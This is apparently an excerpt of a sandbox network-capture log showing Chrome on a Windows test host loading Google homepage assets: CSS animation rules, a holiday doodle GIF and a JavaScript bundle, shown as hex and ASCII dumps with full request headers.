2024-12-12 21:40:20 UTC	1390	IN	Data Raw: 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 7d 36 32 2e 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 36 37 35 64 65 67 29 7d 37 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 38 31 30 64 65 67 29 7d 38 37 2e 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 34 35 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 74 75 72 6e 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 62 6c 75 65 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 2e 39 39 7d 32 35 25 7b 6f 70 61 63 69 74 79 3a 30 2e 39 39 7d 32 36 25 7b 6f 70 61 63 69 74 79 3a 30 7d 38 39 25 7b 6f 70 61 63 69 74 79 3a 30 7d 39 30 25 7b 6f 70 61 63 69 74 79 3a 30 2e 39 39 7d 31 Data Ascii: ansform:rotate(540deg)}62.5%{transform:rotate(675deg)}75%{transform:rotate(810deg)}87.5%{transform:rotate(945deg)}100%{transform:rotate(3turn)}}@keyframes qli-blue-fade-in-out{0%{opacity:0.99}25%{opacity:0.99}26%{opacity:0}89%{opacity:0}90%{opacity:0.99}1
2024-12-12 21:40:20 UTC	735	IN	Data Raw: 62 20 2e 74 53 33 50 35 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 47 67 54 4a 57 65 20 2e 6e 4e 4d 75 4f 64 20 2e 4a 37 75 75 55 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 71 6c 69 2d 6c 65 66 74 2d 73 70 69 6e 20 31 33 33 33 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 47 67 54 4a 57 65 20 2e 6e 4e 4d 75 4f 64 20 2e 73 44 50 49 43 7b 61 6e 69 6d 61 74 69 6f 6e 3a 71 6c 69 2d 72 69 67 68 74 2d 73 70 69 6e 20 31 33 33 33 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 42 53 6e 4c 62 20 2e 6e 4e 4d 75 4f 64 20 2e 4a 37 75 75 55 65 7b 61 Data Ascii: b .tS3P5{border-bottom-color:transparent}.GgTJWe .nNMuOd .J7uuUe{animation:qli-left-spin 1333ms cubic-bezier(0.4,0,0.2,1) infinite both}.GgTJWe .nNMuOd .sDPIC{animation:qli-right-spin 1333ms cubic-bezier(0.4,0,0.2,1) infinite both}.BSnLb .nNMuOd .J7uuUe{a
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 72 69 67 68 74 2d 73 70 69 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 33 30 64 65 67 29 7d 7d 2e 56 44 67 56 69 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 79 55 54 4d 6a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 7a 4a 55 75 71 66 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 70 78 7d 2e 41 42 34 57 66 66 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 70 78 7d 2e 4f 68 53 63 69 Data Ascii: keyframes qli-right-spin{0%{transform:rotate(-130deg)}50%{transform:rotate(5deg)}100%{transform:rotate(-130deg)}}.VDgVie{text-align:center}.yUTMj{font-family:Roboto,Arial,sans-serif;font-weight:400}.zJUuqf{margin-bottom:4px}.AB4Wff{margin-left:16px}.OhSci
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: 6f 74 68 7d 2e 54 78 6e 67 6e 62 2e 54 78 6e 67 6e 62 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 7d 2e 54 78 6e 67 6e 62 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6c 65 78 3a 31 20 31 20 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 31 34 70 78 20 30 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 2e 73 48 46 4e 59 64 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 38 70 78 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 36 39 70 78 29 20 61 6e 64 20 28 6d 69 6e 2d 68 65 69 67 68 74 3a 35 36 39 70 78 29 7b 2e 4c 48 33 77 47 2c 2e 6a 68 5a 76 6f 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 57 75 30 76 39 62 2c 2e 79 4b 36 6a 71 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 Data Ascii: oth}.Txngnb.Txngnb{line-height:20px}.Txngnb{color:#fff;flex:1 1 auto;margin:14px 0;word-break:break-word}.sHFNYd{margin-right:-8px}@media (min-width:569px) and (min-height:569px){.LH3wG,.jhZvod{text-align:center}.Wu0v9b,.yK6jqe{display:inline-block;max-wi
2024-12-12 21:40:20 UTC	887	IN	Data Raw: 72 3d 72 74 6c 5d 20 2e 74 59 6d 66 78 65 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 32 2e 35 70 78 2c 31 2e 38 70 78 29 20 72 6f 74 61 74 65 5a 28 34 35 64 65 67 29 7d 2e 49 42 50 5a 75 2e 74 59 6d 66 78 65 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 32 2e 35 70 78 2c 2d 35 2e 37 70 78 29 20 72 6f 74 61 74 65 5a 28 34 35 64 65 67 29 7d 5b 64 69 72 3d 72 74 6c 5d 20 2e 49 42 50 5a 75 2e 74 59 6d 66 78 65 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 32 2e 35 70 78 2c 2d 35 2e 37 70 78 29 20 72 6f 74 61 74 65 5a 28 34 35 64 65 67 29 7d 2e 6f 51 63 50 74 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 Data Ascii: r=rtl] .tYmfxe{transform:translate(-2.5px,1.8px) rotateZ(45deg)}.IBPZu.tYmfxe{transform:translate(2.5px,-5.7px) rotateZ(45deg)}[dir=rtl] .IBPZu.tYmfxe{transform:translate(-2.5px,-5.7px) rotateZ(45deg)}.oQcPt{border-bottom:none;border-left:1px solid rgba(0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49725	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:20 UTC	1396	OUT	GET /logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:20 UTC	660	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 87886 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Sat, 07 Dec 2024 13:23:23 GMT Expires: Sun, 07 Dec 2025 13:23:23 GMT Cache-Control: public, max-age=31536000 Age: 461817 Last-Modified: Mon, 25 Nov 2024 19:22:10 GMT Content-Type: image/gif Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:20 UTC	730	IN	Data Raw: 47 49 46 38 39 61 f4 01 c8 00 f7 ff 00 b5 ff f8 8d b8 fe 14 4e f2 ff bb 01 1d 1a 1b fe fc b1 98 5b 99 8d 8f 8e fd 9a 47 fe f3 4e 9f f6 ad 70 70 70 98 96 5a fd ba b8 02 fd ce ff cd 0b 06 d8 a6 00 ac 44 76 93 ff 9a 5c 68 4b 98 ff ff 54 48 ee 71 d7 01 f6 fd 6c ae fe 4b 4b 4a 6d 9a 8f fe fa 6d fd f7 92 ff 48 b1 48 ad f3 9f 92 24 fd 90 8c 92 fe f6 f3 96 fc 0f dd 4a 00 d7 f0 f6 b3 f9 ff 71 6d dd 8e fc d0 dd fe 9e 1a 19 e3 33 62 5f 55 14 fe db 50 5c 14 11 5d 20 4e 5b 6c a1 1f 48 63 fd b6 d5 fe 47 8b 53 9a 6e 23 5d a1 41 f6 5c 11 1d 5c fb 71 b8 d0 d1 b1 fc 44 3a 15 d3 24 fd 8d da 08 27 e4 a0 2e 53 97 cc fe 33 ab ef 72 fd f7 50 68 f2 fd dc 6c 07 64 29 fc 8e b6 ae d2 ca b2 fb cf cc ff da 2a ff d1 0a bd 8c 14 2a a0 d8 b8 b7 24 ba 68 92 ab ae 84 71 11 4c fc d6 b2 8f Data Ascii: GIF89aN[GNpppZDv\hKTHqlKKJmmHH$Jqm3b_UP\] N[lHcGSn#]A\\qD:$'.S3rPhld)**$hqL
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: ee dd ca 54 ff 7b c2 dd c9 e8 ff c9 ee dd 1e bd 9b 03 33 99 ee bb ca e3 eb 22 37 ef 33 78 ff 99 33 cc cc e1 ee cc dd ff 22 47 ee dd 43 22 99 ff ff ff ff 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 05 08 00 ff 00 2c 00 00 00 00 f4 01 c8 00 00 08 ff 00 19 09 1c 48 b0 a0 c1 83 08 13 2a 5c c8 b0 a1 c3 87 10 23 4a 9c 48 b1 a2 c5 8b 18 33 6a dc c8 b1 a3 c7 8f 20 43 8a 1c 49 b2 a4 c9 93 28 53 aa 5c c9 b2 a5 cb 97 30 63 ca 9c 49 b3 a6 cd 9b 38 73 ea dc c9 b3 a7 cf 9f 40 83 0a 1d 4a b4 a8 d1 a3 48 93 2a 5d ca b4 a9 d3 a7 50 a3 4a 9d 4a b5 aa d5 ab 58 b3 6a dd ca b5 ab d7 af 60 c3 8a 1d 4b b6 ac d9 b3 68 d3 aa 5d cb b6 ad db b7 70 e3 ca 9d 4b b7 ae dd bb 78 f3 ea dd cb b7 af df bf 80 03 0b 1e 4c b8 b0 e1 c3 88 13 2b 5e cc b8 b1 e3 c7 90 23 4b Data Ascii: T{3"73x3"GC"!NETSCAPE2.0!,H\#JH3j CI(S\0cI8s@JH]PJJXj`Kh]pKxL+^#K
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: 42 a0 11 fb 40 b3 4c df 62 64 06 23 57 cd 2b 7c 81 92 96 ec a6 37 07 22 8b 05 d0 41 9e 04 91 85 2f 72 f1 4a 85 94 13 9d e7 54 27 3b 07 02 87 03 50 83 1a aa f0 65 43 86 71 8b 59 de f3 a6 6a c4 00 0a 20 32 0c 3a 8c 33 23 07 dc 85 31 8f 19 88 38 24 b3 81 0a ad c2 12 29 12 29 b7 89 01 04 18 b4 a6 ed b2 a9 cd 73 39 cc 9b a9 50 c5 40 9a 70 00 5f 30 4f 16 b2 b0 05 2e 16 00 87 3b 32 e4 a4 28 8d 80 4a 57 ca 88 5c 64 c0 17 62 7d 2b 43 76 01 43 9c da 55 8d 14 d0 85 4b 50 10 84 66 84 c0 a0 44 45 68 32 ad 20 80 2c b0 22 23 4d 9d 05 25 9e ba 48 29 06 ed 15 a7 b0 e8 45 2b 79 55 ac 12 c4 16 19 f8 86 3e 16 70 00 b2 6a 20 1c 0b f8 e7 59 d3 9a ce 92 ae f4 00 19 58 40 06 9a 87 10 14 d8 f4 ae b0 9d a1 0f 96 6a 12 d4 ff ed 62 11 44 3d e8 51 2f f0 40 12 c0 02 b1 6d 83 82 18 00 Data Ascii: B@Lbd#W+\|7"A/rJT';PeCqYj 2:3#18$))s9P@p_0O.;2(JW\db}+CvCUKPfDEh2 ,"#M%H)E+yU>pj YX@jbD=Q/@m
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: 09 f6 86 5a ea b6 11 c3 20 8b b3 38 8b 0a 45 48 dd 40 7a 7c a8 8b ff 01 05 04 00 05 3b 92 7f 22 17 12 6d f7 88 69 95 8c 95 b8 00 06 02 82 da a8 8d 6c 98 10 48 f7 8d a7 28 43 18 c0 74 26 c1 0c 92 20 09 2e c0 09 22 e0 0a 74 90 01 8b 58 46 ed b8 91 c8 03 09 3f d0 07 e2 60 83 1a c1 7e db e3 05 04 30 0d 05 49 42 23 d1 76 03 f8 8f 1d 78 65 fc 91 8d 29 59 90 0d a1 0b 1e a0 90 a8 ff 38 8e e5 e8 02 92 20 02 8c 80 59 9f 78 11 cd b0 91 b3 78 0b b0 00 00 21 89 12 ec 87 0d 18 87 92 05 69 84 21 71 91 be e0 7b a4 c5 04 fd 97 8e e3 71 1e 0a 72 21 5e f2 1f 0b 11 00 df 78 93 da f7 12 10 29 91 85 b0 05 45 b7 73 20 21 01 44 19 04 2e a1 55 ee d1 76 e2 f4 94 25 01 07 a9 55 6e a4 15 7c d6 97 1e e6 81 1f 5c 69 21 69 22 8a 09 b1 0b 37 f9 03 62 39 43 a9 d8 12 cc b0 78 a1 05 07 70 Data Ascii: Z 8EH@z\|;"milH(Ct& ."tXF?`~0IB#vxe)Y8 Yxx!i!q{qr!^x)Es !D.Uv%Un\|\i!i"7b9Cxp
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: bb c2 50 40 09 19 03 0e 91 70 28 8a 46 34 37 ff 8c 76 f6 a1 c3 ef 6b 98 1e 10 43 f7 fb 10 40 1c c4 34 24 8e 05 d1 0a 7d dc a6 39 90 28 71 9b 0a 2f 62 00 04 90 09 50 dc 01 c4 90 10 d6 50 c5 6f 60 0d fb d9 59 0e 58 a4 5f ec ae f1 fa 93 51 2a 10 a7 43 b4 d1 9b 4f 28 b0 54 bb 30 70 38 05 c7 02 21 c7 6a c5 77 9e c6 08 f9 8b c7 9e cc ab d7 5a c4 8c 64 02 27 3c b1 79 6a 25 50 30 06 19 93 03 e4 72 03 43 46 49 5f f3 b9 8c 66 1f ed f0 be e0 fc be 31 e4 c3 70 64 c9 69 64 b6 03 81 ad 0c 6b 02 b3 c0 bb 04 91 01 76 50 ca 01 cc bb aa 70 ae 31 2b 04 62 7c 10 70 20 90 e5 fa bb ed b9 c0 7e 3b 10 08 eb bc f8 1a bd ed 55 ad 05 b1 0b 91 77 4f c0 cc 08 33 40 5a 6a b5 0c 02 e1 98 8c e0 c1 eb 0c b1 08 92 b6 be 5a 0b 26 9c 86 d0 9c b9 d3 1c a3 d7 7c 03 24 4d 49 37 a0 c7 60 3b 42 Data Ascii: P@p(F47vkC@4$}9(q/bPPo`YX_Q*CO(T0p8!jwZd'<yj%P0rCFI_f1pdidkvPp1+b\|p ~;UwO3@ZjZ&\|$MI7`;B
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: 94 29 55 9e ac 55 01 c4 ac 54 15 65 ce a4 59 d3 e6 4d 9c 39 75 ee e4 d9 d3 e7 ce 54 41 83 b6 22 3a 6b d6 12 31 63 40 e4 a8 d5 14 5c 8a 28 4d 6b bd 4a e1 88 48 03 a3 b3 88 12 55 26 0d 83 07 0f f5 30 ae a2 b0 eb e7 ce 00 63 17 9a 8d 08 62 e5 ab 5a 8d 68 1e 20 90 ab 66 83 a9 2b 4d 40 54 c5 62 e0 5f 81 d6 78 ca a2 6b 97 91 35 c0 7f 85 40 44 a8 96 ec c3 b3 ba 1c 6b 94 c8 f1 a3 c7 90 23 4b be e5 cc 32 47 9b 46 ad ce 8e 26 5d da f4 69 d4 a9 29 0a 4d b5 35 eb 18 31 8d 96 36 bd 96 62 92 ff d4 57 e0 7a 98 21 92 75 2b d1 54 ed 2e 95 23 5e 0e 63 00 d5 15 77 25 54 8b 61 22 08 dc 29 41 cc a4 43 00 97 cd 46 79 55 4e 67 a4 4a 48 e2 81 6f 78 d2 bd 0e f1 0d 78 81 e2 21 62 70 bc 4a d7 e8 5b 93 37 5e c6 2c 12 a2 89 ce 9c 73 b8 84 c9 d3 17 2e 5f 64 49 6e 40 02 0b 34 b0 34 d6 Data Ascii: )UUTeYM9uTA":k1c@\(MkJHU&0cbZh f+M@Tb_xk5@Dk#K2GF&]i)M516bWz!u+T.#^cw%Ta")ACFyUNgJHoxx!bpJ[7^,s._dIn@44
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: 0d 3c b1 2c 1a 8e 55 11 00 95 40 00 a0 37 91 d8 cd ae 49 40 cc c1 29 6a d1 06 a9 05 2a 28 b3 68 44 1b 1e 97 3a 86 4e 91 16 0f a0 45 63 1d eb 58 c6 3a e3 ff 0d ec f0 82 17 3a aa 8a 58 58 e3 0d b5 44 8f 33 84 c1 88 65 1c c1 08 f1 a8 86 2d e0 60 52 02 c0 a0 3d 2a a5 c3 2e 06 7a 90 5d e8 22 00 a2 53 5a 65 62 3a 40 88 70 6b 5f fc d9 18 44 02 86 0d 40 98 e1 0b d0 04 aa 50 f1 21 83 2b 20 b7 02 0d c8 80 61 22 a8 54 a6 46 97 8e 4e d5 1d 51 a6 21 86 25 00 af 36 29 e8 41 0b 6c a0 84 09 ec 80 18 42 f1 ea 21 69 ab 96 6e a4 b6 1e 14 60 6f 3d e4 a4 52 1a 2e a4 14 14 90 00 01 5e 00 50 bb ca e4 00 51 8c 48 2e c4 10 89 ef 41 8d 5f 6d 30 41 81 4d 60 d8 c3 7a eb 94 32 b1 46 31 1e fb e0 c7 6e 83 1e 6e 10 02 0b 58 e0 8c 90 4a 6a 00 78 50 87 30 14 b0 89 21 24 02 0e 89 c8 80 49 Data Ascii: <,U@7I@)j(hD:NEcX::XXD3e-`R=.z]"SZeb:@pk_D@P!+ a"TFNQ!%6)AlB!in`o=R.^PQH.A_m0AM`z2F1nnXJjxP0!$I
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: c0 06 28 f2 25 9d 50 1c 5f 40 85 d8 f2 81 4b a0 81 4b c0 00 a6 c4 00 18 80 81 00 f0 81 62 7c 36 88 38 c6 fe 63 86 13 28 84 2e 28 81 2e 50 46 68 04 07 15 20 40 02 dc 82 18 fc 9d 02 6b 03 b4 24 b0 1c 6b 80 56 18 39 9e 39 87 9f d9 49 b9 94 4b 6a 90 9e 9e 89 38 55 50 06 cd 12 82 0a b3 b0 0b 13 82 37 b0 06 77 94 08 61 a8 06 a6 03 00 23 80 05 36 f0 c0 0f 0c 83 05 30 a8 89 18 06 5d 60 ab 4b 78 2b a7 7c 01 1f d0 85 cf 31 a1 f3 72 0f 9f 10 47 b7 ab 08 8d cb ae b3 8c 84 16 e0 0d 22 b0 03 28 88 09 c5 c9 45 9a 88 07 02 28 84 4b f0 03 3f 38 84 10 44 c5 55 04 02 54 08 07 51 d0 3b d2 aa 49 e0 54 18 ff 10 68 84 fd 5a 00 a1 94 09 55 90 85 3c 89 06 b9 c3 85 90 a4 09 83 9b 08 7d 40 15 5b b0 85 6f 28 8c 99 b0 ca fe 23 82 3d 30 80 13 10 01 f0 5c 83 35 d8 03 15 e8 01 b1 b4 03 Data Ascii: (%P_@KKb\|68c(.(.PFh @k$kV99IKj8UP7wa#60]`Kx+\|1rG"(E(K?8DUTQ;IThZU<}@[o(#=0\5
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: d3 88 05 6d d0 82 16 c8 15 93 4d 0d 18 66 64 66 28 83 3d c8 04 59 fd de 2e 10 cf 1c 26 87 75 d0 e4 4d a6 09 38 c0 06 1a 99 b2 1e 10 0d 24 7e 5c 5e b0 06 06 18 04 7f ce 80 27 76 82 0f b8 03 4c 58 65 57 86 65 9f 10 86 99 54 8e ce ec 59 01 96 89 13 84 17 d0 29 bc ff a3 45 3f c3 1b 84 80 a1 3b 03 31 07 23 f8 04 2f 98 01 3a 06 5e 05 a8 03 96 ac 02 54 40 83 4a 8d e6 f0 4b a5 28 20 db 9b 72 45 9d fd 09 a1 63 00 2f c8 00 b2 e5 38 37 33 8d 71 66 86 12 f8 82 42 28 83 ef 0d ea ef 9d 83 2d 30 80 2d d0 4e 1f d6 2f 31 48 c0 8c 4c 81 46 c8 e7 58 e0 05 5e e0 00 37 58 81 61 ad ac 81 de 86 6d 28 06 16 e0 00 4c f0 82 c6 85 5c fd 24 10 ac 73 8c b2 82 68 1f 68 68 85 b8 65 fe 09 02 5e 46 3f 2c 53 02 1e 70 07 7d 80 66 d2 10 06 5e e0 c0 47 45 02 0a 2e c2 3a 28 80 90 6e 49 5b 48 Data Ascii: mMfdf(=Y.&uM8$~\^'vLXeWeTY)E?;1#/:^T@JK( rEc/873qfB(-0-N/1HLFX^7Xam(L\$shhhe^F?,Sp}f^GE.:(nI[H
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: 40 61 a8 53 ab ce 09 6b fa f4 d8 d4 65 23 3a e4 95 99 ed 07 b7 70 13 f4 eb 97 80 45 dd 84 c5 0a 30 74 68 56 e2 e4 e0 c2 87 13 2f 6e fc 38 f2 8a b1 0e 64 38 97 f9 a8 d2 4f 07 16 c8 0a 2d 95 6a 69 a9 a7 c3 32 9b 73 35 35 54 9d 66 5b bb 66 b1 8d a0 c1 b7 49 93 e2 b6 bb 9b 01 14 df 66 55 ca 42 95 fc 3e fe fc fa f7 f3 6f 09 f1 9c 17 07 68 c3 ce 66 6e 84 f2 99 2d 8e b9 d2 1d 33 a9 a1 b6 60 55 0d 92 b5 d3 78 e4 bd f1 cb 40 70 b1 b0 5e 52 06 25 c4 02 3b 0c 9c 83 d6 6f 28 e5 d2 04 2c bb f4 b7 22 8b 2d ba f8 e2 4f be 2c e0 c5 67 5e d0 88 4b 64 e0 41 c5 60 6a cc 90 a6 1a 85 ac 91 57 40 31 e7 15 54 0c 87 ec d9 b5 01 3b 5e 68 43 e2 7c 19 d9 92 41 06 28 aa 58 11 2a f6 c1 b8 25 97 5d 7a 79 9f 2d b9 e4 e2 ff 4b 82 c1 39 48 95 84 51 4d 35 47 76 ae f8 54 61 5a ae bd 21 d0 Data Ascii: @aSke#:pE0thV/n8d8O-ji2s55Tf[fIfUB>ohfn-3`Ux@p^R%;o(,"-O,g^KdA`jW@1T;^hC\|A(X*%]zy-K9HQM5GvTaZ!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49726	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:20 UTC	3966	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCEAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=1/ed=1/dg=3/br=1/rs=ACT90oE8aTDhxVJ6ryzMKSmV26RPmG6BpA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXJSm:ii1RGf;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplu [TRUNCATED] Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
